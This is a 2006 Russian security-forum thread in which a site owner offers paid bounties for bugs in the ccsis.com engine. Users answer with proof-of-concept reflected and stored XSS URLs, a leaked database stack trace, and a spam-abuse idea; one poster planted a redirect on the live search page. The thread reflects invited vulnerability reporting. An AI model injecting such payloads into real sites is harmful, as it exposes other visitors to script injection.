Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Плачу за поиск уязвимостей! (всё законно) |
05.10.2006, 19:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Плачу за поиск уязвимостей! (всё законно)
Плачу за поиск уязвимостей в этом движке http://ccsis.com/
от 30 до 500$ за уязвимость.
Подробности и условия здесь: http://ccsis.com/topic9.htm
Если есть вопросы, задавайте тут или там.
ONK
|
|
|
|
05.10.2006, 19:05
|
|
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213
Репутация:
378
|
|
http://ccsis.com/index.php?action="><script>alert('lol');</script>
XSS, то есть не есть хорошо....
Последний раз редактировалось InferNo23; 05.10.2006 в 19:08..
|
|
|
05.10.2006, 19:11
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
http://ccsis.com/index.php?sn="><script>alert(/censored!/)</script>
Разыне ошибки. Почему?
http://ccsis.com/index.php?action=5
You cannot access to module with id = 5.
http://ccsis.com/index.php?action=5-1
Module with id = 5 is not found.
Градация уязвимостей по их стоимости:
SQL injection в ядре системы (пака core) - 500$
PHP Script injection - 400$
SQL injection в общедоступных модулях-300$
SQL injection в админцентре системы-200$
XSS-50$
Внедрение Js в html код сообщения (при разрешённом html коде) - 80$
Ошибки распределения прав (чат, форум, админцентр) - 30 - 50$ / за ошибку*
Мы с InferNo23 заработали по 50 уе? =)
Считаю что расценки вам надо пересмотреть. А то 1000 быстро закончатся =)
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
Последний раз редактировалось censored!; 05.10.2006 в 19:13..
|
|
|
|
05.10.2006, 19:34
|
|
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213
Репутация:
378
|
|
Вот когда создаешь новую тему в форуме...:
PHP код:
Array
(
[0] => Array
(
[file] => /home/ccsis.com/htdocs/inc/mysql.php
[line] => 136
[function] => ccsis_error
)
[1] => Array
(
[file] => /home/ccsis.com/htdocs/inc/mysql.php
[line] => 147
[function] => query
[class] => db_mysql
[type] => ->
[args] => Array
(
[0] => Duplicate entry '11-0' for key 1
INSERT INTO `ccsis_tu_favor` (topic_id,user_id,date)VALUES('11','0','1160062370')
[1] => 2
)
)
[2] => Array
(
[file] => /home/ccsis.com/htdocs/inc/local9.lib.php
[line] => 588
[function] => safe_query
[class] => db_mysql
[type] => ->
[args] => Array
(
[0] => INSERT INTO `ccsis_tu_favor` (topic_id,user_id,date)VALUES('11','0','1160062370')
)
)
[3] => Array
(
[file] => /home/ccsis.com/htdocs/inc/modules/add_content.mod.php
[line] => 384
[function] => add_topic_in_forum
)
[4] => Array
(
[file] => /home/ccsis.com/htdocs/inc/core/global.lib.php
[line] => 1016
[function] => create_topic
[args] => Array
(
[0] => INSERT INTO `ccsis_tu_favor` (topic_id,user_id,date)VALUES('%1$d','%2$d','%3$d')
[1] => 11
[2] => 0
[3] => 1160062370
)
)
[5] => Array
(
[file] => /home/ccsis.com/htdocs/inc/core/global.lib.php
[line] => 1164
[function] => exec_node
[class] => ccsis
[type] => ::
[args] => Array
(
[0] => 0
[1] => InferNo23
[2] => 8
[3] => 0
[4] => http://ccsis.com/index.php?action=">alert('lol');
Âîò XSS...
[5] => XSS
[6] => 0
)
)
[6] => Array
(
[file] => /home/ccsis.com/htdocs/index.php
[line] => 45
[function] => execute
[class] => ccsis
[type] => ::
[args] => Array
(
)
)
)
[15:32:50] Duplicate entry '11-0' for key 1 INSERT INTO `ccsis_tu_favor` (topic_id,user_id,date)VALUES('11','0','1160062370')
|
|
|
|
05.10.2006, 19:38
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
Случайно заметил орф. ошибку:
Ошибка: Введённый вами адрс эектронной почты имеет неверный формат.
Активная XSS:
http://ccsis.com/index.php?action=159
Что ищем? -> <script>alert(/censored!/)</script>
Жмем поиск. Ничего не найдено.
Теперь опять заходим на страницу с поиском. Код попал на страницу в "Последние поисковые запросы."
p.s. щас по http://ccsis.com/index.php?action=159 повесил редирект на эту тему.
http://ccsis.com/index.php?action=user_mail&uid=ONK
Всего лишь подозрение (не проверял)
Собрать с форума имена пользователей не проблема.
А потом уже можно скриптом заспамить ящики пользователей или таким образом делать спам-рассылку.
Вообщем - пересматривайте расценки =)
Дальше смотреть и копать смысла нету. Там все сырое.
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
Последний раз редактировалось censored!; 05.10.2006 в 19:47..
|
|
|
|
05.10.2006, 19:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
InferNo23, напишите темку в SECURITY BUGS, думаю, что 50$ вы заработали.
|
|
|
|
05.10.2006, 19:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
censored!, ошибки разные из-за того, что строки и числа в идентификаторе модуля обрабатываются по разному, т.е. ошибки возникают на разных этапах.
Поправлю...
|
|
|
|
05.10.2006, 19:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Вот когда создаешь новую тему в форуме...:
InferNo23, Спасибо за баг, такого там много т.к. это первая бэта. Поправлю.
|
|
|
|
05.10.2006, 19:55
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
Мне все-равно из-за чего ошибки. Увидел - сообщил.
А с активной Xss что? Оплачивается? =)
p.s. там уже кто-то после меня алерт с Тестом воткнул =)
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
Последний раз редактировалось censored!; 05.10.2006 в 19:57..
|
|
|
|
05.10.2006, 19:57
|
|
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131
Репутация:
774
|
|
Так...
http://ccsis.com/index.php?action=160&search_id="><script>alert('te st')</script>
__________________
Завтра будет.Лучше.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
